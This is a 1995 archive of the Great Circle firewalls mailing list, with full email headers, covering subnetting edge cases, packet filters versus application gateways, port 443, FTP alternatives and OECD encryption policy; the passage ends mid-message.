INFORWORLD, 9/11/95 From firewalls-owner Fri Oct 13 08:44:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05007 for firewalls-outgoing; Fri, 13 Oct 1995 08:33:45 -0700 Received: from services ([168.166.0.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA05000 for ; Fri, 13 Oct 1995 08:33:41 -0700 Received: from services by services (SMI-8.6/SMI-SVR4) id KAA16107; Fri, 13 Oct 1995 10:33:12 -0500 Date: Fri, 13 Oct 1995 10:33:10 -0500 (CDT) From: "Frank K. Senter" X-Sender: fsenter@services To: Howard Berkowitz cc: Yannick Gravel , firewalls@GreatCircle.COM Subject: Re: First and last subnet ??? In-Reply-To: <199510121505.LAA00133@clark.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If a network is subnetted, what are routers *supposed* to do with broadcasts to the "whole" network? Where might confusion arise between the network address and its all zero's subnet?---Routing info? Forgive me if these are particularly dumb questions--I've been up most of the night, and my power light is flickering rather dimly. Frank Senter Senior Information Specialist Missouri Highway and Transportation Department P.O. Box 270 Jefferson City MO 65102 [snip] >A pair of simple examples: > > 172.31.0.0 > 172.31.0.0 > > One is subnet zero of network 172.31.0.0, the other is the whole > network. Which is which? > > 172.31.255.255 > 172.31.255.255 > > One is the broadcast for the whole network; the other is the > broadcast for subnet 255. Again, which is which? > [snip] > > Howard > From firewalls-owner Fri Oct 13 08:45:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05022 for firewalls-outgoing; Fri, 13 Oct 1995 08:34:17 -0700 Received: from rds.com (wpgate.rds.com [206.54.49.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA05015 for ; Fri, 13 Oct 1995 08:34:11 -0700 Received: from RDS-Message_Server by rds.com with Novell_GroupWise; Fri, 13 Oct 1995 08:28:35 -0700 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Fri, 13 Oct 1995 08:34:21 -0700 From: Doug Kaye To: firewalls@GreatCircle.COM Subject: Re: Firewall1 Comparison -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm seeing a lot of discussion on pack filters vs. application gateways. Does it make sense to implement both? Is it too expensive or overkill? If you implement both, where does the filter go -- on the public side of the application gateway? Is it possible to run both on the same hardware? ============================================================ Doug Kaye Rational Data Systems, Novato, CA Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com From firewalls-owner Fri Oct 13 08:46:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05031 for firewalls-outgoing; Fri, 13 Oct 1995 08:35:08 -0700 Received: from gateway.ppg.com (gateway.ppg.com [199.221.65.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA05024 for ; Fri, 13 Oct 1995 08:35:03 -0700 Received: by gateway.ppg.com id AA08563 (SMTP Gateway for firewalls@GreatCircle.COM); Fri, 13 Oct 1995 11:32:56 -0400 Message-Id: <199510131532.AA08563@gateway.ppg.com> Received: by gateway.ppg.com (Protected-side Proxy Mail Agent-1); Fri, 13 Oct 1995 11:32:56 -0400 From: "Sacherich, Larry" To: "'Firewalls-Digest-L'" Cc: "'Walt Herrmann'" Subject: Re: Firewall1 Comparison Date: Fri, 13 Oct 95 11:25:00 PDT Encoding: 19 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Walt, Every security book or white paper that I have read indicates that an application level gateway is the best form of security. I goes a step beyond just packet filtering. You would be well advised to at least talk to firewall vendors like ANS, TIS, and Boarderware. ANS 800-456-8267 info@ans.net http://www.ans.net/ TIS 301-854-6889 avolio@tis.com http://www.tis.com/ Net- 800-723-1166 sales@netpart.com http://www.netpart.com Partners Larry Sacherich sacherich@ppg.com Comments are my personal opinion, and not that of PPG Industries. From firewalls-owner Fri Oct 13 08:47:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05071 for firewalls-outgoing; Fri, 13 Oct 1995 08:40:08 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA05064 for ; Fri, 13 Oct 1995 08:40:05 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id KAA25609; Fri, 13 Oct 1995 10:38:12 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id KAA17838; Fri, 13 Oct 1995 10:38:32 -0500 From: Alan Hannan Message-Id: <199510131538.KAA17838@gaijin.mid.net> Subject: Re: Firewall1 Comparison To: avolio@TIS.COM (Frederick M Avolio) Date: Fri, 13 Oct 1995 10:38:32 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9510131312.AA03024@tis.com> from "Frederick M Avolio" at Oct 13, 95 09:12:54 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1085 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ......... Frederick M Avolio is rumored to have said: ] ] >>Application gateways are more secure. ] > ] >This statement is perhaps too strong. ] ] Indeed, I am being dogmatic, in my loveable way. :-) Indeed, though we may argue on adverbs. IMHO saying Application Gateways are more secure is a very true statement. How about this one? "Adding more services makes one more likely to have security problems", or "A policy of that which is not allowed is denied is more secure than a policy of that which is not disallowed is allowed." While I can find a secure firewall that has more more services than an insecure one in _general_ the rule is true. Likewise, a firewall with 'not allowed denied' is not necessarily more secure than a firewall with 'not denied allowed'. My point, dealing with the packet in and of itself, as opposed to based upon the mac/tcp/ip/udp headers is significantly more secure, generally speaking. -- Alan Hannan http://www.mid.net/~alan 402/472-0239 Network Systems/Security Administrator MIDnet, Inc. From firewalls-owner Fri Oct 13 08:48:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04498 for firewalls-outgoing; Fri, 13 Oct 1995 07:59:36 -0700 Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA04491 for ; Fri, 13 Oct 1995 07:59:32 -0700 Received: from wittsend.UUCP by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.16) via UUCP id AA06978 ; Fri, 13 Oct 95 10:57:26 -0400 Received: by wittsend (/\==/\ Smail3.1.28.1 #28.1) for id ; Fri, 13 Oct 95 10:53 EDT Message-Id: Subject: Re: firewalls for WIN95 To: savron@world-net.sct.fr Date: Fri, 13 Oct 1995 10:52:55 -0400 (EDT) From: "Michael H. Warfield" Cc: firewalls@greatcircle.com In-Reply-To: <199510130836.JAA17359@world-net.sct.fr> from "savron@world-net.sct.fr" at Oct 13, 95 09:36:09 am X-Mailer: ELM [version 2.4 PL20] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 579 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This was just toooooo tempting.... savron@world-net.sct.fr enscribed thusly: > > is there any firewalling solution for a WIN95 pc ? Dunno. Still trying to get the virus detectors to spot Windows 95. Getting a firewall to exclude it may be a little tougher. :-) :-) > Thanks Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From firewalls-owner Fri Oct 13 09:22:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA05592 for firewalls-outgoing; Fri, 13 Oct 1995 09:07:40 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA05585 for ; Fri, 13 Oct 1995 09:07:36 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Fri, 13 Oct 1995 17:05:34 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <307E9416@smtpgty.saicuk.co.uk>; Fri, 13 Oct 95 16:30:14 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: Encryption Date: Fri, 13 Oct 95 13:29:00 GMT Message-ID: <307E9416@smtpgty.saicuk.co.uk> Encoding: 15 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Two OECD groups have been working towards a position paper on rules and standards for encryption across national boundaries. The current position is that they expect to release the paper to member governments in December, subject to completion of review of a US government proposal. The next stage will be to release the paper to governments and industry. This is expected to be in April/May 1996. The timetable may be subject to change and it is possible that a second government-only circulation will take place before the government/industry stage. Some member governments have said that they will move rapidly to enact legislation and may accept the recomendations as quazi-law as early as January 1996. That could mean that some national rules are changed before a consultation period with industry. The appropriate sections of each member government may be prepared to discuss the situation but will be highly resistant to a confrontational approach. Ian J-B From firewalls-owner Fri Oct 13 09:31:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA05542 for firewalls-outgoing; Fri, 13 Oct 1995 09:02:46 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA05535 for ; Fri, 13 Oct 1995 09:02:41 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id MAA25836; Fri, 13 Oct 1995 12:00:21 -0400 From: Howard Berkowitz Message-Id: <199510131600.MAA25836@clark.net> Subject: Re: First and last subnet ??? To: fsenter@mail.state.mo.us (Frank K. Senter) Date: Fri, 13 Oct 1995 12:00:17 -0400 (EDT) Cc: hcb@CLARK.NET, yg@muturl.planet-int.net, firewalls@GreatCircle.COM In-Reply-To: from "Frank K. Senter" at Oct 13, 95 10:33:10 am X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 2188 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > If a network is subnetted, what are routers *supposed* to do with > broadcasts to the "whole" network? Where might confusion arise between > the network address and its all zero's subnet?---Routing info? Answering a bit indirectly, broadcasts to the whole network number -- if it is subnetted -- are at best discouraged. It's much better to send directed broadcasts to specific subnets. Yes, routing updates are a potential source of confusion. If there is no mask information, the router can't tell whether something is destined for the whole network -- a potential error if the network is subnetted -- or for subnet zero. > > Forgive me if these are particularly dumb questions--I've been up most of > the night, and my power light is flickering rather dimly. I'm hand-waving a bit, because subnet zero/all-one work sometimes... it is dependent on both the routing protocols and the implementations The subnet zero/all-one restrictions tend to go away when dealing with classless routing. Again, there can be compatibility problems. Two general points: 1. The idea of a network number is at best obsolescent in a CIDR world. The idea of a prefix is much closer. 2. Yes, you can get away sometimes with subnet zero and subnet all-ones. I avoid them because experience has shown often enough that they lead to incompatibilities. Given the range of methods available for gaining address space/subnetting, I can't think of a time I was ever forced to use the illegal subnet numbers. This is getting somewhat far afield of firewalls, I'm afraid. > > > Frank Senter > Senior Information Specialist > Missouri Highway and Transportation Department > P.O. Box 270 > Jefferson City MO 65102 > [snip] > >A pair of simple examples: > > > > 172.31.0.0 > > 172.31.0.0 > > > > One is subnet zero of network 172.31.0.0, the other is the whole > > network. Which is which? > > > > 172.31.255.255 > > 172.31.255.255 > > > > One is the broadcast for the whole network; the other is the > > broadcast for subnet 255. Again, which is which? > > > [snip] > > > > Howard > > > From firewalls-owner Fri Oct 13 10:05:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA06375 for firewalls-outgoing; Fri, 13 Oct 1995 09:48:32 -0700 Received: from translation.com (pao.translation.com [204.30.204.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA06367 for ; Fri, 13 Oct 1995 09:48:20 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id JAA23794; Fri, 13 Oct 1995 09:45:35 -0700 Date: Fri, 13 Oct 1995 09:45:35 -0700 Message-Id: <199510131645.JAA23794@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma023787; Fri Oct 13 09:44:38 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Howard Berkowitz , yg@muturl.planet-int.net (Yannick Gravel) From: Andrew Foss Subject: Re: First and last subnet ??? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is kind of a stickler. Let's say you want to subnet a Class C 198.9.200.0 w/ 1 bit of netmask to make 2 126(128 lest 2) node networks, it's not allowed(as per the RFC and many peoples IP stacks)! The minimum subnet you can make is 2 bits which will make 2(NOT 4) networks of 62 numbers. e.g. 198.9.200.0 w/ a netmask 255.255.255.192 ( 2bit netmask ) yields Network 1 198.9.200.0-198.9.200.63 - Which becomes unusable since you cannot refer to it since 198.9.200.0 is reserved(though rarely used) as a means to broadcast to all the subnets(if you broadcast 0's)! Network 2 198.9.200.64-198.9.200.127 - Is a usable subnet 198.9.200.64 Network 3 198.9.200.128-128.9.200.191 - Is a usable subnet 198.9.200.128 Network 4 198.9.200.192-129.9.200.255 - Unusable, same as Network 1, if you broadcast 1's. It's too bad, since very few people require the broadcast to all the subnet's capability and it makes subnetting Class C's rediculously inefficient. Many, Many people do it though and I've run into a few that have been bitten. Most newer systems seem to function fine, but I've run into a few vestigial machines that can't live on the broadcast networks(for lack of a better name). At 08:05 AM 10/12/95 -0700, Howard Berkowitz wrote: >> >> Hi Net&Sys Security poeples, >> >> Something that everybody is talking about, but not everybody >> is saying the same thing about subnetting: >> >> Yes, everybody agree that we lose the first and last host of >> each subnet for net.iding and broadcasting. >> >> But, some are saying that I can use all subnet; but others are >> saying that we lose the first and last subnet... >> >> Whom truth is true.. >> >> Thanks.. >> >> Yannick Gravel >> System administrator -- yannick.gravel@planet-int.net >> > >This is a FAQ about a confusing subject. The IP RFC states that >the all ones and all zeroes subnets are illegal. I recommend >not using them. > >They will work in some circumstances, but can cause obscure >problems later. A pair of simple examples: > > 172.31.0.0 > 172.31.0.0 > >One is subnet zero of network 172.31.0.0, the other is the whole >network. Which is which? > > 172.31.255.255 > 172.31.255.255 > >One is the broadcast for the whole network; the other is the >broadcast for subnet 255. Again, which is which? > >You may say that's its easy enough to figure this out if you know >the subnet mask. "Classful" routing protocols such as RIP and >IGRP, however, don't transmit the mask in routing updates. If >the receiving host or router doesn't have another way to learn >the mask, it can't interpret the address and is likely to have >a problem with the all zeroes and all ones subnets. > >Classless routing protocols such as OSPF, EIGRP, and Integrated >IS-IS do send mask information, so in principle they can >support the all zeroes and all ones subnets. Problems can occur, >however, if they have to export such an address into a classful >routing environment. > >Some routers will let you configure these subnets, others will >never allow it. Cisco lets you do it only if you explicitly >configure it; it will give you a %bad mask diagnostic if not. > >Howard > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Fri Oct 13 10:14:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06923 for firewalls-outgoing; Fri, 13 Oct 1995 10:06:53 -0700 Received: from dewey.umi.com (dewey.umi.com [192.195.245.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA06916 for ; Fri, 13 Oct 1995 10:06:50 -0700 Received: from namer.umi.com by dewey.umi.com with smtp (Smail3.1.28.1 #17) id m0t3nah-0008nSC; Fri, 13 Oct 95 13:08 EDT Received: from pdoffice.umi.com by namer.umi.com with smtp (Smail3.1.28.1 #16) id m0t3nQC-0004w3C; Fri, 13 Oct 95 12:57 EDT Received: by pdoffice.umi.com (Smail3.1.28.1 #15) id m0t3nPW-000CWpC; Fri, 13 Oct 95 12:56 EDT Message-Id: Date: Fri, 13 Oct 95 12:56 EDT From: "TMOONEY.UMI.COM" To: Chris.Brenton@newsedge.com Subject: Re: Port question Cc: firewalls@greatcircle.com X-Orcl-Application: In-Reply-To:ORAMAIL.UMI.COM:firewalls-owner@GreatCircle.COM's message of 11-Oct-95 20:15 X-Orcl-Content-Type: multipart/mixed; boundary=Boundary-112613-0-0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --Boundary-112613-0-0 Netscape Secure Commerce Servers recommend using port 443 for https connections. Tom --Boundary-112613-0-0 X-Orcl-Content-Type: message/rfc822 Received: 11 Oct 1995 20:30:29 Sent: 11 Oct 1995 20:23:21 From:"Chris Brenton" To: firewalls@GreatCircle.COM Subject: Port question Reply-to: Chris.Brenton@newsedge.com X-Orcl-Application: Mime-Version: 1.0 X-Orcl-Application: Content-Type: text/plain; charset=us-ascii X-Sender: X-Mailer: X-Orcl-Application: Sender: firewalls-owner@GreatCircle.COM X-Orcl-Application: Precedence: bulk Does anyone know what port 443 is used for? Check out: http://necxdirect.necx.com Your passed to port 8002 and then 443. Does anyone see any problems with opening up port 443 access to the net? Thanks for any help! --Boundary-112613-0-0-- From firewalls-owner Fri Oct 13 10:35:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA07141 for firewalls-outgoing; Fri, 13 Oct 1995 10:17:51 -0700 Received: from cseic.saic.com (CSEIC.SAIC.COM [139.121.32.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA07134 for ; Fri, 13 Oct 1995 10:17:46 -0700 Received: from [139.121.32.149] by cseic.saic.com (4.1/1.34) id AA15587; Fri, 13 Oct 95 13:12:20 EDT Message-Id: <9510131712.AA15587@cseic.saic.com> X-Sender: steveg@cseic.saic.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 13 Oct 1995 13:24:11 -0400 To: Scott Barman From: "Stephen H. Goldstein" Subject: Re: Various FTPs Cc: padgett@tccslr.dnet.mmc.com, firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:18 AM 10/13/95 -0400, Scott Barman wrote: >On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote: > >> I agree with Marcus concerning the probloms in FTP & possibly IPV6 >> will repair/replace it. For now I suspect that the answer is a > >I have been "observing" the output of the IETF for IPv6 and have seen >nothing regarding changing ftp. It seems their concerns are a larger >address space and security. I don't think I'm alone in my desire to see >something replace it and, as Marcus Ranum said about himself in a previous >note, I'm not "big" enough to try to force a change! > >scott barman >-- Question 1: I'm curious as to why one would even bother with modifying FTP to use a different port. If it's so bad, why not serve up your files via Gopher or HTTP? Are they worse? Question 2: Assuming that in the interest of protecting themselves everyone mods their FTP servers using approaches similar to IWI and Microsoft, how much risk to systems on the client side is added by loosening filters to compensate? --- Stephen Goldstein steveg@cseic.saic.com My first computer: A 24K Atari 800, Rev. A ROMS, November 1980 Disclaimer: That's not what I said. From firewalls-owner Fri Oct 13 11:14:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08329 for firewalls-outgoing; Fri, 13 Oct 1995 11:06:31 -0700 Received: from sequoia.itd.uts.EDU.AU (sequoia.itd.uts.EDU.AU [138.25.16.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA08314 for ; Fri, 13 Oct 1995 11:06:22 -0700 Received: from lordmuck.itd.uts.edu.au by sequoia.itd.uts.EDU.AU with SMTP id AA24529 (5.65c/IDA-1.4.4 for ); Sat, 14 Oct 1995 04:04:26 +1000 Received: (from matt@localhost) by lordmuck.itd.uts.edu.au (8.7.1/8.7/Jas) id EAA04335 for firewalls@greatcircle.com; Sat, 14 Oct 1995 04:06:40 +1000 (EST) From: Jas (Matthew K) Message-Id: <199510131806.EAA04335@lordmuck.itd.uts.edu.au> Subject: Re: Various FTPs To: firewalls@greatcircle.com (Firewalls Mailing List) Date: Sat, 14 Oct 1995 04:06:40 +1000 (EST) In-Reply-To: from "Scott Barman" at Oct 13, 95 11:18:13 am X-Gcb: -----BEGIN GEEK CODE BLOCK----- X-Gcb: Version: 3.1 X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) C+++$ UVS++++$ P+++ L+ E++ W++ N++ X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+ X-Gcb: D+ e h- r !y X-Gcb: ------END GEEK CODE BLOCK------ X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Scott Barman wrote this... > On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote: >> I agree with Marcus concerning the probloms in FTP & possibly IPV6 >> will repair/replace it. For now I suspect that the answer is a > I have been "observing" the output of the IETF for IPv6 and have seen > nothing regarding changing ftp. It seems their concerns are a larger > address space and security. I don't think I'm alone in my desire to see > something replace it and, as Marcus Ranum said about himself in a previous > note, I'm not "big" enough to try to force a change! well why dont we put our collective heads together and make a firewall friendly file transfer protocol? then we can have people write up the code on different platforms (we have enough knowledge here for almost every possible conceivable platform), and GPL the stuff. well? any takers? myself personally im in. Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Systems Programmer Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike From firewalls-owner Fri Oct 13 12:31:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10693 for firewalls-outgoing; Fri, 13 Oct 1995 12:21:10 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA10686 for ; Fri, 13 Oct 1995 12:21:06 -0700 Received: from uucp5.UU.NET by relay3.UU.NET with SMTP id QQzlht19822; Fri, 13 Oct 1995 15:19:17 -0400 Received: from vanguard.UUCP by uucp5.UU.NET with UUCP/RMAIL ; Fri, 13 Oct 1995 15:19:18 -0400 Received: by vanguard.hmp.com (UUPC/extended 1.12b); Fri, 13 Oct 1995 11:35:00 MDT Date: Fri, 13 Oct 1995 11:34:59 MDT From: "Scott Deshaies" Message-ID: <307ea344.vanguard@vanguard.hmp.com> Organization: High Mountain Press, Inc. To: firewalls@greatcircle.com Subject: Re: Various FTPs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 13 Oct 1995 11:18:13 -0400 (EDT), "Scott Barman" wrote: > ... I don't think I'm alone in my desire to see > something replace it and, as Marcus Ranum said about himself in a previous > note, I'm not "big" enough to try to force a change! How about 15,000 Firewalls readers? ;) I think if Marcus added a new FTP daemon to the FWTK, we would love to implement it along side our old FTP connections until it became a de facto standard. Add in the FWTK-User readers, and I think we could be "big" enough over time. If we are the ones to control access to the Internet, we can help dictate it's use, right? -- >> Scott R. Deshaies <> High Mountain Press, Inc. << >> MIS Manager <> 2530 Camino Entrada * Santa Fe, NM 87505 << >> sdeshaies@hmp.com <> Direct:505/474-5103 http://www.hmp.com << From firewalls-owner Fri Oct 13 12:43:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11002 for firewalls-outgoing; Fri, 13 Oct 1995 12:29:23 -0700 Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA10990 for ; Fri, 13 Oct 1995 12:29:19 -0700 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma013493; Fri Oct 13 15:26:46 1995 Posted-Date: Fri, 13 Oct 1995 15:26:41 -0400 Date: Fri, 13 Oct 1995 15:26:41 -0400 (EDT) From: "Bryan D. Boyle" Subject: Re: Firewall1 Comparison To: "Sacherich, Larry" Cc: "'Firewalls-Digest-L'" , "'Walt Herrmann'" In-Reply-To: <199510131532.AA08563@gateway.ppg.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk there is also a page with most of the firewall contact information on the web at: http://www.access.digex.net/~bdboyle/firewall.vendor.html if anyone is interested. Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 | PAGE: bboyle@apt1.pagemart.com #include | http://www.access.digex.net/~bdboyle/index.html "It seems that 'national security' is the root password to the Constitution. As with any dishonest superuser, the best countermeasure is strong encryption." -Phil Karn On Fri, 13 Oct 1995, Sacherich, Larry wrote: > > Walt, > > Every security book or white paper that I have read indicates > that an application level gateway is the best form of security. > I goes a step beyond just packet filtering. You would be well > advised to at least talk to firewall vendors like ANS, TIS, and > Boarderware. > > ANS 800-456-8267 info@ans.net http://www.ans.net/ > TIS 301-854-6889 avolio@tis.com http://www.tis.com/ > Net- 800-723-1166 sales@netpart.com http://www.netpart.com > Partners > > > Larry Sacherich > sacherich@ppg.com > > Comments are my personal opinion, and not that of PPG Industries. > From firewalls-owner Fri Oct 13 13:02:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11764 for firewalls-outgoing; Fri, 13 Oct 1995 12:47:37 -0700 Received: from nda.nda.com (fw1.nda.COM [204.57.47.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA11750 for ; Fri, 13 Oct 1995 12:47:33 -0700 Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id PAA20036; Fri, 13 Oct 1995 15:45:33 -0400 From: David Kovar Message-Id: <199510131945.PAA20036@nda.nda.com> Subject: Re: Firewall1 Comparison -Reply To: dkaye@rds.com (Doug Kaye) Date: Fri, 13 Oct 1995 15:45:33 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Doug Kaye" at Oct 13, 95 08:34:21 am X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 713 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I'm seeing a lot of discussion on pack filters vs. application gateways. Does it make > sense to implement both? Is it too expensive or overkill? If you implement both, where > does the filter go -- on the public side of the application gateway? Is it possible to run both > on the same hardware? FW-1 includes application gateways for FTP and telnet while doing everything else with a dynamic packet filtering scheme. This puts both on the same hardware. It is common to use a router in conjuction with a host running an application gateway. If you put access lists into the router, you are now running packet filters and application gateways. I'm all for defense in depth in most situations. -David From firewalls-owner Fri Oct 13 13:15:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA12603 for firewalls-outgoing; Fri, 13 Oct 1995 13:07:21 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA12596 for ; Fri, 13 Oct 1995 13:07:18 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id NAA28793; Fri, 13 Oct 1995 13:05:28 -0700 From: Paul Ferguson Message-Id: <199510132005.NAA28793@lint.cisco.com> Subject: Re: Firewall1 Comparison -Reply To: dkaye@rds.com (Doug Kaye) Date: Fri, 13 Oct 95 13:05:28 PDT Cc: firewalls@GreatCircle.COM In-Reply-To: ; from "Doug Kaye" at Oct 13, 95 8:34 am X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Quite frankly, it makes very good sense to do both; overlapping security mechanisms is usually a Good Thing. - paul > > I'm seeing a lot of discussion on pack filters vs. application gateways. Does it make > sense to implement both? Is it too expensive or overkill? If you implement both, where > does the filter go -- on the public side of the application gateway? Is it possible to run both > on the same hardware? > > ============================================================ > Doug Kaye Rational Data Systems, Novato, CA > Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com > > > -- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. c i s c o S y s t e m s From firewalls-owner Fri Oct 13 14:04:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14223 for firewalls-outgoing; Fri, 13 Oct 1995 13:46:24 -0700 Received: from kcpgw.kcp.com (kcpgw.kcp.com [198.62.69.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA14216 for ; Fri, 13 Oct 1995 13:46:19 -0700 Received: by kcpgw.kcp.com id AA12964 (InterLock SMTP Gateway 3.0 for firewalls@GreatCircle.COM); Fri, 13 Oct 1995 15:44:23 -0500 Message-Id: <199510132044.AA12964@kcpgw.kcp.com> Received: by kcpgw.kcp.com (Protected-side Proxy Mail Agent-1); Fri, 13 Oct 1995 15:44:23 -0500 Mime-Version: 1.0 Date: Fri, 13 Oct 1995 15:22:46 -0500 From: dharris@kcp.com (Delmer Harris) Subject: Re[2]: Firewall1 Comparison -Reply To: firewalls@GreatCircle.COM, Doug Kaye Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Non-authoritative reply: Yes, it makes sense to implement both if what you are protecting is worth the cost in $ and in people. I do both, sort of, by 